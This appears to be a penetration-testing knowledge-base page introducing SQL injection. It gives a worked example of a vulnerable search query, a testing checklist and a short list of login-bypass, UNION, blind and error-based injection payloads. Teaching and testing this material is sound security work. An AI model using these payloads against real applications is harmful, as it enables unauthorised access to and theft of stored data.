SQL injection overview
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
SQL injection is where an attacker is able to manipulate database queries made by an application.
A simple example
A vulnerable web application has the endpoint /search?product={productName}
When a request is made, the application uses SQL to search for the product SELECT * FROM products WHERE name=$productName
If an attacker inserts a payload into {productName}
such as anything' UNION SELECT password FROM users WHERE username = 'admin
that modifies the query, sensitive data could be leaked.
The vulnerable application sends this query to the database and the database returns the admin's password.
It's important to note that a payload or attack may change depending on the application, the query, and the database. SQL injection can often lead to:
Sensitive data exposure
Data manipulation
Remote code execution
Denial of service
Other learning resources:
PostSwigger: https://portswigger.net/web-security/sql-injection
Writeups:
Have a good writeup & want to share it here? Drop me a message on LinkedIn.
Verify injection points
URL parameters
Form fields
HTTP headers (e.g. cookies, etc)
Test ' and "
Can you trigger an error?
Can you trigger a different response?
Test with SQLmap
Test for login bypass ' and 1=1-- -
etc
Test for blind SQLi
Test for errors
Test for conditional responses
Test for conditional errors
Test for out-of-band interactions
Test for NoSQL injection
Is there a blocklist?
Can you bypass the blocklist?
Encoding
Test for second-order SQLi
# Basic login bypass
' AND 1=1#
# UNION SELECT
' UNION SELECT null,null FROM users-- -
# Blind
' AND SUBSTR((SELECT version()),1,1)='7'#
CAST((SELECT example_column FROM example_table) AS int)
Out-of-band (e.g. data retrieved from a third party)
Test for time delays
Alternative characters
Alternative payloads